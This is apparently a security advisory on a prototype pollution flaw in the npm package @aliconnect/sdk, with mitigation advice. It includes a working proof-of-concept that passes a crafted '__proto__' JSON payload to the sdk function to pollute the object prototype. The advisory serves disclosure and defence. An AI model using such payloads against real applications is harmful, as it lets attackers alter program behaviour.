Affected versions of this package are vulnerable to Prototype Pollution via the sdk function due to missing check if the attribute resolves to the object prototype.
To exploit vulnerability, someone may inject a malicious object from a user controllable input to aim function in aim.js. The input resolves to the object prototype thus modify the behavior of the program.
var sdk = require("@aliconnect/sdk")
BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
console.log('before prototype pollution: polluted:', {}.polluted)
sdk({}, BAD_JSON)
console.log('After prototype pollution: polluted:', {}.polluted)- Freeze the prototype— use Object.freeze (Object.prototype).
- Validation of JSON inputs.
- Use Map instead of Object.
- Crete objects without prototype, that will break the prototype chain and preventing pollution. Example:
let obj = Object.create(null);
obj.__proto__ // undefined
obj.constructor // undefinedhttps://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b